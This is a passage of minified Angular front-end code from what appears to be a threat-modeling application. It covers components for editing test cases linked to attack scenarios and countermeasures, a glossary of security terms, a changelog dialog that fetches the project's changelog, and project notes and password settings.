"),m(58,"mat-form-field",8),s(59,"\n      "),m(60,"mat-label"),s(61),oe(62,"translate"),u(),s(63,"\n      "),m(64,"input",2),he("ngModelChange",function(n){return be(e),Me(B().testCase.Version=n)}),u(),s(65,"\n    "),u(),s(66,"\n    "),it(67,"br"),s(68),oe(69,"translate"),it(70,"app-notes",14),s(71),oe(72,"translate"),it(73,"app-notes",15),s(74),oe(75,"translate"),it(76,"app-notes",14),s(77),oe(78,"translate"),it(79,"app-notes",16),s(80),oe(81,"translate"),m(82,"button",17),he("click",function(){return be(e),Me(Ti(88).click())}),oe(83,"translate"),m(84,"mat-icon"),s(85,"add_photo_alternate"),u()(),s(86,"\n    "),m(87,"input",18,19),he("change",function(n){return be(e),Me(B().OnFileSelected(n))}),u(),s(89,"\n    "),m(90,"div",20),s(91,"\n      "),ne(92,bPe,14,1,"div",21),s(93,"\n    "),u(),s(94,"\n    "),m(95,"div",22),s(96,"\n      "),m(97,"div",23),s(98,"\n        "),m(99,"mat-list",24),s(100,"\n          "),ne(101,vPe,15,15,"mat-list-item",25),s(102,"\n        "),u(),s(103,"\n        "),m(104,"mat-menu",null,26),s(106,"\n          "),ne(107,EPe,7,9,"ng-template",27),s(108," \n        "),u(),s(109,"\n        "),m(110,"mat-menu",null,28),s(112,"\n          "),ne(113,xPe,3,1,"ng-template",27),s(114," \n        "),u(),s(115,"\n        "),m(116,"mat-menu",null,29),s(118,"\n          "),ne(119,IPe,3,1,"ng-template",27),s(120," \n        "),u(),s(121,"\n      "),u(),s(122,"\n      "),m(123,"div",30),s(124,"\n        "),ne(125,SPe,10,1,"ng-container",0),s(126,"\n      "),u(),s(127,"\n    "),u(),s(128,"\n  "),u(),s(129,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,48,"general.Name")),C(3),at("matTooltip",e.testCase.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Name),C(3),V("ngIf",e.testCase.Name),C(6),ke(re(18,50,"general.Number")),C(3),at("matTooltip",e.testCase.Number),V("ngModel",e.testCase.Number),C(2),V("ngIf",e.testCase.CheckUniqueNumber()),C(8),ke(re(31,52,"properties.Status")),C(3),at("matTooltip",re(34,54,e.GetTestCaseStateName(e.testCase.Status))),V("value",e.testCase.Status),C(3),V("ngForOf",e.GetTestCaseStates()),C(4),at("matTooltip",re(41,56,"pages.modeling.diagram.addAttackScenario")),V("disabled",!e.canAddAttackScenario),C(10),ke(re(51,58,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Description),C(8),ke(re(62,60,"pages.modeling.testcase.verison")),C(3),at("matTooltip",e.testCase.Version),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.testCase.Version),C(4),ct("\n    ",re(69,62,"properties.PreConditions"),":\n    "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.PreConditions),C(1),ct("\n    ",re(72,64,"properties.Steps"),":\n    "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("enumerateItems",!0)("strings",e.testCase.Steps),C(1),ct("\n    ",re(75,66,"properties.TestData"),":\n    "),C(2),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.testCase.TestData),C(1),ct("\n    ",re(78,68,"properties.Summary"),":\n    "),C(2),V("showTimestamp",!0)("hasCheckbox",!1)("notes",e.testCase.Summary),C(1),ct("\n    ",re(81,70,"general.Images"),":\n    "),C(2),at("matTooltip",re(83,72,"general.Add")),C(10),V("ngForOf",e.testCase.Images),C(7),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(2),V("ngForOf",e.linkLists),C(24),V("ngIf",e.selectedLinks)}}let gM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.dataService=n,this.theme=r,this.dialog=c,this.router=d,this.activatedRoute=T,this.linkLists=[],this.selectedLinks=null,this.searchString="",this.groups={},e&&(this.testCase=e),i&&i.subscribe(k=>this.testCase=k)}get testCase(){return this._testCase}set testCase(e){this._testCase=e,this.selectedLinks=null,this.RefreshLinks()}get canAddAttackScenario(){return this.testCase.LinkedElements.length>0}ngOnInit(){this.RefreshLinks()}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}RefreshLinks(e=null){this.linkLists=[],this.linkLists.push({Key:"properties.LinkedElements",Value:this.testCase.LinkedElements}),this.linkLists.push({Key:"properties.LinkedScenarios",Value:this.testCase.LinkedScenarios}),this.linkLists.push({Key:"properties.LinkedMeasures",Value:this.testCase.LinkedMeasures}),e&&(this.selectedLinks=this.linkLists.find(i=>i.Key===e)),this.groups={}}AddAttackScenario(){const e=this.testCase.LinkedElements[0],i=this.GetItemView(e),n=this.dataService.Project.CreateAttackScenario(i.ID,!1);n.SetMapping("",[],e,[e],null,null,null,null),n.IsGenerated=!1,n.Name=this.testCase.Name,n.Description=this.testCase.Description,this.dialog.OpenAttackScenarioDialog(n,!0).subscribe(r=>{r?(this.testCase.AddLinkedAttackScenario(n),this.RefreshLinks()):this.dataService.Project.DeleteAttackScenario(n)})}AddLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.AddLinkedElement(e):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.AddLinkedAttackScenario(e):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.AddLinkedCountermeasure(e),this.RefreshLinks(this.selectedLinks.Key)}RemoveLink(e){"properties.LinkedElements"===this.selectedLinks.Key?this.testCase.RemoveLinkedElement(e.ID):"properties.LinkedScenarios"===this.selectedLinks.Key?this.testCase.RemoveLinkedAttackScenario(e.ID):"properties.LinkedMeasures"===this.selectedLinks.Key&&this.testCase.RemoveLinkedCountermeasure(e.ID),this.RefreshLinks(this.selectedLinks.Key)}OnItemClick(e){if(e instanceof Np){const i={viewID:this.GetItemView(e).ID,elementID:e.ID};this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:i,replaceUrl:!0})}else e instanceof Rc?this.dialog.OpenAttackScenarioDialog(e,!1):e instanceof Jl&&this.dialog.OpenCountermeasureDialog(e,!1,[])}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:1920,useWebWorker:!0};try{const n=yield(0,FG.Z)(e.target.files[0],i),r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.testCase.Images=[...this.testCase.Images,c.target.result.toString()]}}catch(n){console.log(n)}}})}DeleteImage(e){const i=this.testCase.Images.indexOf(e);i>=0&&this.testCase.Images.splice(i,1)}ViewImage(e){this.dialog.OpenViewImageDialog(e)}GetItemView(e){return e instanceof Np?this.testCase.GetViewOfLinkedElement(e):e instanceof Rc||e instanceof Jl?this.dataService.Project.GetView(e.ViewID):void 0}GetMenuGroups(e){if(null==this.groups[e.Key]){this.groups[e.Key]=[];const i=[];this.dataService.Project.GetDevices().forEach(n=>{i.push(n.HardwareDiagram),n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),this.dataService.Project.GetMobileApps().forEach(n=>{n.SoftwareStack&&i.push(n.SoftwareStack),n.ProcessStack&&i.push(n.ProcessStack)}),i.push(...this.dataService.Project.GetDFDiagrams()),"properties.LinkedElements"===e.Key?i.forEach(n=>{let r;n instanceof ns?r=n.Elements.GetChildrenFlat():n instanceof Om&&(r=n.GetChildrenFlat()),r&&(r=r.filter(c=>!this.testCase.LinkedElements.includes(c)),r.length>0&&this.groups[e.Key].push({Key:n,Value:r}))}):"properties.LinkedScenarios"===e.Key?i.forEach(n=>{const r=this.dataService.Project.GetAttackScenariosApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedScenarios.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})}):"properties.LinkedMeasures"===e.Key&&i.forEach(n=>{const r=this.dataService.Project.GetCountermeasuresApplicable().filter(c=>c.ViewID==n.ID&&!this.testCase.LinkedMeasures.includes(c));(null==r?void 0:r.length)>0&&this.groups[e.Key].push({Key:n,Value:r})})}return this.groups[e.Key]}GetTestCaseStates(){return Qg.GetKeys()}GetTestCaseStateName(e){return Qg.ToString(e)}GetFilteredList(e){return e.flatMap(i=>i.Value).filter(i=>i.Name.toLowerCase().includes(this.searchString.toLowerCase()))}OnSearchBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee($g,8),Ee(Tt,8),Ee(Yi),Ee(Oa),Ee(Wn),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-test-case"]],viewQuery:function(e,i){if(1&e&&(Mi(pPe,5),Mi(_Pe,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{testCase:"testCase"},decls:1,vars:1,consts:[[4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"disabled","matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","strings"],[3,"showTimestamp","hasCheckbox","enumerateItems","strings"],[3,"showTimestamp","hasCheckbox","notes"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],[2,"overflow","auto"],["class","imgContainer",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],["addMenu","matMenu"],["matMenuContent",""],["itemMenu","matMenu"],["filteredList","matMenu"],[1,"column2"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[1,"imgContainer"],[3,"src","click"],["projImg",""],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","matMenuTriggerData","placeholder","ngModelChange","click"],["searchBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-menu-item","",3,"click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",2,"font-size","small !important",3,"click"]],template:function(e,i){1&e&&ne(0,kPe,130,74,"div",0),2&e&&V("ngIf",i.testCase)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.imgContainer[_ngcontent-%COMP%]{position:relative;float:left;margin-right:10px}.imgContainer[_ngcontent-%COMP%]   img[_ngcontent-%COMP%]{max-height:100px;height:auto}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]{position:absolute;left:0;top:0}.imgContainer[_ngcontent-%COMP%]   .removeBtn[_ngcontent-%COMP%]   button[_ngcontent-%COMP%]{width:20px;height:20px}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})(),PPe=(()=>{class t{constructor(e){e&&(this.image=e.Value)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(E2,8))},t.\u0275cmp=Wt({type:t,selectors:[["app-image-view"]],inputs:{image:"image"},decls:1,vars:1,consts:[[2,"width","100%","height","100%",3,"src"]],template:function(e,i){1&e&&it(0,"img",0),2&e&&V("src",i.image,nm)}}),t})();const OPe=["termsImg"];function NPe(t,a){1&t&&(m(0,"span"),s(1," | "),u())}function LPe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",4),he("click",function(){const r=be(e).$implicit;return Me(B().ScrollTo(r))}),s(3),u(),s(4,"\n    "),ne(5,NPe,2,0,"span",5),s(6,"\n  "),Mt()}if(2&t){const e=a.$implicit,i=a.last,n=B();C(2),ri("color",n.theme.IsDarkMode?"white":"black"),Ct("primary-color",null!=n.glossary[e]),C(1),ke(e),C(2),V("ngIf",!i)}}function zPe(t,a){if(1&t&&(m(0,"p")(1,"strong"),s(2),u(),s(3),u()),2&t){const e=a.$implicit;C(2),ct("",e.name,":"),C(1),ct(" ",e.description,"")}}function WPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n      "),m(2,"h3"),s(3),u(),s(4,"\n      "),ne(5,zPe,4,2,"p",2),s(6,"\n    "),u()),2&t){const e=B().$implicit,i=B();C(3),ke(e),C(2),V("ngForOf",i.glossary[e])}}function FPe(t,a){if(1&t&&(bt(0),s(1,"\n    "),ne(2,WPe,7,2,"div",5),s(3,"\n  "),Mt()),2&t){const e=a.$implicit,i=B();C(2),V("ngIf",i.glossary[e])}}const VPe=["Asset","AttackScenario","AttackVector","Countermeasure","IoT-Device","Mitigation","MitigationProcess","Risk","RiskAssessment","SystemThreat","Threat","ThreatAnalysis","ThreatModeling","ThreatSource","Vulnerability","Weakness"];let BPe=(()=>{class t{constructor(e,i,n){this.theme=e,this.dialog=i,this.translate=n,this.alphabet=[],this.glossary={},this.termsImageSrc="./assets/Terms_en.png"}ngOnInit(){for(let e=0;e<26;e++)this.alphabet.push(String.fromCharCode("A".charCodeAt(0)+e));VPe.forEach(e=>{const i={name:this.translate.instant("glossary."+e+".n"),description:this.translate.instant("glossary."+e+".d")};null==this.glossary[i.name[0]]&&(this.glossary[i.name[0]]=[]),this.glossary[i.name[0]].push(i)}),"de"===this.translate.currentLang&&(this.termsImageSrc=this.termsImageSrc.replace("_en","_de"))}ScrollTo(e){const n=Array.from(document.getElementsByTagName("h3")).find(r=>r.textContent==e);n&&n.scrollIntoView()}ViewImage(){this.dialog.OpenViewImageDialog(this.termsImage.nativeElement.src,"1200px")}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-glossary"]],viewQuery:function(e,i){if(1&e&&Mi(OPe,5),2&e){let n;Vt(n=Bt())&&(i.termsImage=n.first)}},decls:12,vars:3,consts:[[2,"width","800px",3,"src","click"],["termsImg",""],[4,"ngFor","ngForOf"],[2,"overflow","auto","width","800px"],[1,"buttonAsText",3,"click"],[4,"ngIf"]],template:function(e,i){1&e&&(m(0,"img",0,1),he("click",function(){return i.ViewImage()}),u(),s(2,"\n"),m(3,"div"),s(4,"\n  "),ne(5,LPe,7,6,"ng-container",2),s(6,"\n"),u(),s(7,"\n"),m(8,"div",3),s(9,"\n  "),ne(10,FPe,4,1,"ng-container",2),s(11,"\n"),u()),2&e&&(V("src",i.termsImageSrc,nm),C(5),V("ngForOf",i.alphabet),C(5),V("ngForOf",i.alphabet))},dependencies:[Zi,Ri],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();const uf_i="0.4.23";function HPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e)}}function UPe(t,a){if(1&t&&(m(0,"div"),s(1,"\n    "),m(2,"h3"),s(3),u(),s(4,"\n    "),m(5,"ul"),s(6,"\n      "),ne(7,HPe,2,1,"li",4),s(8,"\n    "),u(),s(9,"\n  "),u()),2&t){const e=a.$implicit,i=B();ri("opacity",i.IsNewerVersion(e.Key)?.5:1),C(2),Ct("color-primary",e.Key==i.Version),C(1),ke(e.Key),C(4),V("ngForOf",e.Value)}}let qPe=(()=>{class t{constructor(e){this.http=e,this.Version=uf_i,this.Versions=[]}ngOnInit(){this.http.get("https://raw.githubusercontent.com/SecSimon/TTM/main/CHANGELOG.md",{responseType:"text"}).subscribe(e=>{try{let i=null;e.split("\n").forEach(n=>{n.startsWith("#")?(i=n.replace(/#/g,"").trim(),this.Versions.push({Key:i,Value:[]})):i&&n.startsWith("*")&&this.Versions[this.Versions.length-1].Value.push(n.replace("*","").trim())})}catch(i){}})}IsNewerVersion(e){const i=this.Version.replace("v","").split("."),n=e.replace("v","").split(".");if(i.length==n.length)for(let r=0;r<i.length;r++){if(Number(n[r])>Number(i[r]))return!0;if(Number(n[r])<Number(i[r]))break}return!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(op))},t.\u0275cmp=Wt({type:t,selectors:[["app-changelog-dialog"]],decls:14,vars:5,consts:[["mat-dialog-title",""],[3,"opacity",4,"ngFor","ngForOf"],["align","end"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],[4,"ngFor","ngForOf"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1,"CHANGELOG"),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),ne(5,UPe,10,6,"div",1),s(6,"\n"),u(),s(7,"\n"),m(8,"mat-dialog-actions",2),s(9,"\n  "),m(10,"button",3),s(11),oe(12,"translate"),u(),s(13,"\n"),u()),2&e&&(C(5),V("ngForOf",i.Versions),C(5),V("mat-dialog-close",!0),C(1),ke(re(12,3,"general.Close")))},dependencies:[Zi,da,vm,Am,Tm,Em,Xi]}),t})(),R5=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.Project=this.dataService.Project}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-tasks"]],decls:22,vars:16,consts:[["matInput",""],[2,"margin-top","0px"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"]],template:function(e,i){1&e&&(m(0,"mat-form-field"),s(1,"\n  "),it(2,"input",0),s(3,"\n"),u(),s(4,"\n"),m(5,"div"),s(6,"\n  "),m(7,"h4",1),s(8),oe(9,"translate"),u(),s(10,"\n  "),it(11,"app-notes",2),s(12,"\n"),u(),s(13,"\n"),m(14,"div"),s(15,"\n  "),m(16,"h4"),s(17),oe(18,"translate"),u(),s(19,"\n  "),it(20,"app-notes",3),s(21,"\n"),u()),2&e&&(Ct("cdk-visually-hidden",!0),C(8),ke(re(9,12,"general.Tasks")),C(3),V("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.Project.Tasks),C(6),ke(re(18,14,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.Project.Notes))}}),t})();function GPe(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()),2&t&&(C(3),ke(re(4,1,"dialog.modelchanges.noChanges")))}function jPe(t,a){if(1&t&&(m(0,"li"),s(1),u()),2&t){const e=a.$implicit;C(1),ke(e)}}function QPe(t,a){if(1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"ul"),s(7,"\n      "),ne(8,jPe,2,1,"li",1),s(9,"\n    "),u(),s(10,"\n  "),Mt()),2&t){const e=B(2);C(3),ct("",re(4,2,"dialog.modelchanges.incompleteList"),":"),C(5),V("ngForOf",e.Changes)}}function $Pe(t,a){if(1&t&&(m(0,"div"),s(1,"\n  "),ne(2,GPe,6,3,"ng-container",0),s(3,"\n  "),ne(4,QPe,11,4,"ng-container",0),s(5,"\n"),u()),2&t){const e=B();C(2),V("ngIf",!e.dataService.Project.FileChanged),C(2),V("ngIf",e.dataService.Project.FileChanged)}}let qG=(()=>{class t{constructor(e,i){this.dataService=e,this.translate=i,this.Changes=[]}ngOnInit(){this.UpdateChanges()}UpdateChanges(){this.Changes=[],this.dataService.Project&&this.dataService.Project.GetLog().forEach(e=>{let i=e.Title;i.includes(".")||(i=this.translate.instant("general."+e.Title),i.includes("general.")&&(i=this.translate.instant("properties."+e.Title)),i.includes("properties.")&&(i=Gi.FromCamelCase(e.Title)));let n=Gi.Format(this.translate.instant("messages.changes."+e.Type.toString()),this.translate.instant(i));e.Name&&(n+=": "+e.Name),this.Changes.push(n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-changes"]],decls:1,vars:1,consts:[[4,"ngIf"],[4,"ngFor","ngForOf"]],template:function(e,i){1&e&&ne(0,$Pe,6,2,"div",0),2&e&&V("ngIf",i.dataService.Project)},dependencies:[Zi,Ri,Xi]}),t})();function KPe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"status-bar.passwordProtectionOn")))}function XPe(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"status-bar.passwordProtectionOff")))}function YPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-checkbox",7),he("ngModelChange",function(n){return be(e),Me(B().RemovePassword=n)}),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"br"),s(7,"\n    "),m(8,"mat-form-field",8),s(9,"\n      "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n      "),m(14,"input",9),he("ngModelChange",function(n){return be(e),Me(B().ChangePassword=n)}),u(),s(15,"\n      "),m(16,"mat-icon",10),he("click",function(){be(e);const n=B();return Me(n.ShowChangePassword=!n.ShowChangePassword)}),s(17),u(),s(18,"\n      